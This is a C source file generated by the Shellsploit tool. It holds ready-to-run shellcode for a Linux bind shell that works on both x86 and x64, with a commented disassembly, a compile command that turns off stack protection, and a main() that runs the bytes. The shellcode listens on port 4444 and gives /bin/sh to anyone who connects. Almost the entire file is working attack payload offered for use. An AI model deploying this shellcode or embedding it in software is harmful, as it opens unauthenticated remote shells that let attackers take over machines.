179 lines
No EOL
7.5 KiB
C
179 lines
No EOL
7.5 KiB
C
/*
|
|
[+] Author : B3mB4m
|
|
[~] Contact : b3mb4m@protonmail.com
|
|
[~] Project : https://github.com/b3mb4m/Shellsploit
|
|
[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
|
|
|
|
|
|
#If you want test it, you must compile it within x86 OS.
|
|
#Or basically you can get it with shellsploit.
|
|
#Default setthings for port:4444
|
|
|
|
|
|
00000000 31C0 xor eax,eax
|
|
00000002 40 inc eax
|
|
00000003 7460 jz 0x65
|
|
00000005 31DB xor ebx,ebx
|
|
00000007 F7E3 mul ebx
|
|
00000009 B066 mov al,0x66
|
|
0000000B B301 mov bl,0x1
|
|
0000000D 52 push edx
|
|
0000000E 53 push ebx
|
|
0000000F 6A02 push byte +0x2
|
|
00000011 89E1 mov ecx,esp
|
|
00000013 CD80 int 0x80
|
|
00000015 89C6 mov esi,eax
|
|
00000017 B066 mov al,0x66
|
|
00000019 43 inc ebx
|
|
0000001A 52 push edx
|
|
0000001B 6668115C push word 0x5c11
|
|
0000001F 6653 push bx
|
|
00000021 89E1 mov ecx,esp
|
|
00000023 6A10 push byte +0x10
|
|
00000025 51 push ecx
|
|
00000026 56 push esi
|
|
00000027 89E1 mov ecx,esp
|
|
00000029 CD80 int 0x80
|
|
0000002B B066 mov al,0x66
|
|
0000002D B304 mov bl,0x4
|
|
0000002F 52 push edx
|
|
00000030 56 push esi
|
|
00000031 89E1 mov ecx,esp
|
|
00000033 CD80 int 0x80
|
|
00000035 B066 mov al,0x66
|
|
00000037 B305 mov bl,0x5
|
|
00000039 52 push edx
|
|
0000003A 52 push edx
|
|
0000003B 56 push esi
|
|
0000003C 89E1 mov ecx,esp
|
|
0000003E CD80 int 0x80
|
|
00000040 93 xchg eax,ebx
|
|
00000041 31C9 xor ecx,ecx
|
|
00000043 B102 mov cl,0x2
|
|
00000045 B03F mov al,0x3f
|
|
00000047 CD80 int 0x80
|
|
00000049 49 dec ecx
|
|
0000004A 79F9 jns 0x45
|
|
0000004C 92 xchg eax,edx
|
|
0000004D 50 push eax
|
|
0000004E 682F2F7368 push dword 0x68732f2f
|
|
00000053 682F62696E push dword 0x6e69622f
|
|
00000058 89E3 mov ebx,esp
|
|
0000005A 50 push eax
|
|
0000005B 53 push ebx
|
|
0000005C 89E1 mov ecx,esp
|
|
0000005E 50 push eax
|
|
0000005F 89E2 mov edx,esp
|
|
00000061 B00B mov al,0xb
|
|
00000063 CD80 int 0x80
|
|
00000065 48 dec eax
|
|
00000066 31C0 xor eax,eax
|
|
00000068 48 dec eax
|
|
00000069 31FF xor edi,edi
|
|
0000006B 48 dec eax
|
|
0000006C 31F6 xor esi,esi
|
|
0000006E 48 dec eax
|
|
0000006F 31D2 xor edx,edx
|
|
00000071 4D dec ebp
|
|
00000072 31C0 xor eax,eax
|
|
00000074 6A02 push byte +0x2
|
|
00000076 5F pop edi
|
|
00000077 6A01 push byte +0x1
|
|
00000079 5E pop esi
|
|
0000007A 6A06 push byte +0x6
|
|
0000007C 5A pop edx
|
|
0000007D 6A29 push byte +0x29
|
|
0000007F 58 pop eax
|
|
00000080 0F05 syscall
|
|
00000082 49 dec ecx
|
|
00000083 89C0 mov eax,eax
|
|
00000085 4D dec ebp
|
|
00000086 31D2 xor edx,edx
|
|
00000088 41 inc ecx
|
|
00000089 52 push edx
|
|
0000008A 41 inc ecx
|
|
0000008B 52 push edx
|
|
0000008C C6042402 mov byte [esp],0x2
|
|
00000090 66C7442402115C mov word [esp+0x2],0x5c11
|
|
00000097 48 dec eax
|
|
00000098 89E6 mov esi,esp
|
|
0000009A 41 inc ecx
|
|
0000009B 50 push eax
|
|
0000009C 5F pop edi
|
|
0000009D 6A10 push byte +0x10
|
|
0000009F 5A pop edx
|
|
000000A0 6A31 push byte +0x31
|
|
000000A2 58 pop eax
|
|
000000A3 0F05 syscall
|
|
000000A5 41 inc ecx
|
|
000000A6 50 push eax
|
|
000000A7 5F pop edi
|
|
000000A8 6A01 push byte +0x1
|
|
000000AA 5E pop esi
|
|
000000AB 6A32 push byte +0x32
|
|
000000AD 58 pop eax
|
|
000000AE 0F05 syscall
|
|
000000B0 48 dec eax
|
|
000000B1 89E6 mov esi,esp
|
|
000000B3 48 dec eax
|
|
000000B4 31C9 xor ecx,ecx
|
|
000000B6 B110 mov cl,0x10
|
|
000000B8 51 push ecx
|
|
000000B9 48 dec eax
|
|
000000BA 89E2 mov edx,esp
|
|
000000BC 41 inc ecx
|
|
000000BD 50 push eax
|
|
000000BE 5F pop edi
|
|
000000BF 6A2B push byte +0x2b
|
|
000000C1 58 pop eax
|
|
000000C2 0F05 syscall
|
|
000000C4 59 pop ecx
|
|
000000C5 4D dec ebp
|
|
000000C6 31C9 xor ecx,ecx
|
|
000000C8 49 dec ecx
|
|
000000C9 89C1 mov ecx,eax
|
|
000000CB 4C dec esp
|
|
000000CC 89CF mov edi,ecx
|
|
000000CE 48 dec eax
|
|
000000CF 31F6 xor esi,esi
|
|
000000D1 6A03 push byte +0x3
|
|
000000D3 5E pop esi
|
|
000000D4 48 dec eax
|
|
000000D5 FFCE dec esi
|
|
000000D7 6A21 push byte +0x21
|
|
000000D9 58 pop eax
|
|
000000DA 0F05 syscall
|
|
000000DC 75F6 jnz 0xd4
|
|
000000DE 48 dec eax
|
|
000000DF 31FF xor edi,edi
|
|
000000E1 57 push edi
|
|
000000E2 57 push edi
|
|
000000E3 5E pop esi
|
|
000000E4 5A pop edx
|
|
000000E5 48 dec eax
|
|
000000E6 BF2F2F6269 mov edi,0x69622f2f
|
|
000000EB 6E outsb
|
|
000000EC 2F das
|
|
000000ED 7368 jnc 0x157
|
|
000000EF 48 dec eax
|
|
000000F0 C1EF08 shr edi,byte 0x8
|
|
000000F3 57 push edi
|
|
000000F4 54 push esp
|
|
000000F5 5F pop edi
|
|
000000F6 6A3B push byte +0x3b
|
|
000000F8 58 pop eax
|
|
000000F9 0F05 syscall
|
|
*/
|
|
|
|
|
|
//Project : https://github.com/b3mb4m/Shellsploit
|
|
//This file created with shellsploit ..
|
|
//19/01/2016 - 00:36:45
|
|
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
|
|
|
|
unsigned char shellcode[] =
|
|
"\x31\xc0\x40\x74\x60\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
|
|
|
|
int main(void){
|
|
(*(void(*)()) shellcode)();
|
|
} |